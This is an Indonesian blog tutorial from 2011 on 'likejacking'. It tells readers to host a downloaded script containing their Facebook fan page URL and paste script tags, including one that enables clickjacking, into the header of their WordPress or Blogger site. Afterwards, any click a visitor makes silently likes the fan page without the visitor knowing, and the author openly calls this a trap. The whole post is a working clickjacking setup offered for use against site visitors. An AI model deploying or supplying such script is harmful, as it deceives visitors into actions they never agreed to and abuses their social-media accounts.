LikeJaking With Javascript

LikeJaking With Javascript

LikeJaking With Javascript
Thursday 17 November 2011

Punya halaman fan page? Cuman males ngurusin karena ga ada yang ngelike?  Oke guy, eh guys  , kayanya tips berikut yang bakal gue kasih bisa berguna. Simpel aja, tutorial berikut ini bisa bikin visitor web/blog kita otomatis ngelike halaman fan page. Halaman fan page siapa? Ya halaman fan page lu lu pada, masa iya halaman fan page nyokap gue  . Cekidot :
Pertama-tama, download dulu mantranya disini. Next buka dengan text editor (ex. Notepad) cek di line 52, ganti tulisan URL FAN PAGE dengan URL Fan Page kalian, setelah itu save, upload ke hosting masing², trus ambil url link nya, masukin ke script di bawah ini

<script src="http://code.jquery.com/jquery-1.5.js"></script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script>window.DO_CLICKJACKING = 1</script>
<script src="URL JS YANG TADI"></script>
Selanjutnya masuk ke template web/blog, edit htmlnya, untuk wordpress self hosting silahkan buka file header.php di thema yang sedang aktif, sedangkan untuk blogger silahkan tanya sama om gue  , copas script di atas dan sisipkan di atas code </head> setelah itu disave.
Cara kerja script di atas adalah jika ada visitor yang masuk ke web/blog kita, trus dia ngeclick link (link apa aja) otomatis secara tidak sadar dia langsung ngelike fan page yang udah di setting di script pertama tadi, jadi istilahnya kaya jebakan gitu  .
Nah mungkin segitu aja tutorial dari gue, kalau misal ada kesulitan silahkan comment dibawah atau bisa PM gue langsung  .
LikeJaking With Javascript
4/ 5
Oleh
Open Comments
Close comment

2 comments